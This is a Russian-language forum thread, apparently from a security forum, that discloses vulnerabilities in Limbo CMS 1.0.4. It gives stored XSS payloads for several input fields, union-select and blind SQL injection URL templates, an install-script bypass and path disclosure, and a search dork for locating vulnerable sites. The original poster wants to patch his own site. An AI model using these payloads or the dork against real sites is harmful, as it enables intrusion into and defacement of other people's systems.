|
Уязвимости в Limbo CMS
Из-за недавний событий начал искать ошибки на сайте.
Запустил денвер, поставил версию Limbo 1.0.4 Rus 3 и пошел смотреть... Множественные XSS Честно говоря, Либма, это одна большая xss :) Обратная связь http://test1.ru/limba/index.php?option=contact&Itemid=3&PHPSESSID=1fa783 d6dc564bf45cc19f7ae0927250 Если в тело вписать скрипт "><script>alert()</script> Он сработает, когда админ будет читать "обратную связь". Форум В тегах форум съедает "<script>", оставляя ">alert Можно в принципе зашифровать "<script>" и тогда xss сработает. Логика, сам не проверял. Чат Никакой фильтрации в полях "текст.." и в "имя.." нет. Ситуация аналогична как и с обратной связью. Добавление / редактирование объявлений (NewsFlash) http://test1.ru/limba/admin.php?com_option=newsflash Нет никакой фильтрации. "><script>alert()</script> спокойно проходит как в теле сообщения, отображаясь на главной странице, так и в самой администраторской. Совершенно нет никакой фильтрации в модулях http://test1.ru/limba/admin.php?com_option=modules&option=manage Можно вписать скрипт вместо названии темы и он отобразится на главной странице и в админке. Больше всего xss встречается в админке, практический в каждом приложении она присутствует. Sql-injechion (?) http://test1.ru/limba/index.php?option=lurm&sec=gallery&Itemid=49' http://test1.ru/limba/index.php?option=lurm&sec=gallery&Itemid=49+order+ by+5/* http://test1.ru/limba/index.php?option=lurm&sec=gallery&Itemid=49+union+ select+1,2,3,4,5/* Этой баге подвержены: почти все модули на главной странице Что странно, поля находяться, но нет вывода информации на экран, ИМХО надо писать эксплоит, чтобы ею воспользоваться. раскрытие пути Существует, правда, при установке движка, если админ дятел и не удалил папку "install" http://test1.ru/limba/install/index.php?stage=0 http://test1.ru/limba/install/index.php?stage=sfsdfsdf Warning: main(installsdsaf.php): failed to open stream: No such file or directory in z:\home\test1.ru\www\limba\install\index.php on line 51 Цитата:
Кстати, можно перескочить. http://test1.ru/limba/install/index.php?stage=0 заменяем на http://test1.ru/limba/install/index.php?stage=1 если прав не хватает, и устанавливаем систему. А теперь вопрос к вам, уважаемые Античатовцы. От всего спасает штассер, но может ли кто нибудь подсказать, как закрыть эти дыры? Найти было не проблема, сложнее для меня закрыть их(есть сайт на этом движке). Заметил попытки взлома и стал искать дыры, чере которые могли проникнуть. |
сорр за археологию, но заново создавать не оч охото
Limbo - Lite Mambo 1.0.4 SQL Код:
index.php?option=weblinks&catid=[SQL]&Itemid=209Result : index.php?option=weblinks&catid=78+union+select+1, 2,3,4,5,6,7,8,9,10--&Itemid=209 Код:
index.php?option=content&pcontent=1&task=view&id=[blind SQL]&Itemid=194Limbo - Lite Mambo 1.0.4.2RE3 SQL Код:
index.php?option=content&task=view&id=[blind SQL]Код:
index.php?option=weblinks&Itemid=[blind SQL] |
в 1.0.4 RE3, eval();
Цитата:
Цитата:
Код:
inurl:option=lurm |
Цитата:
|
добавить фильтрацию на параметр secid?
|
а в каком он файле лежит? просто неохота ставить себе двиг и ковырять
|
| Время: 15:32 |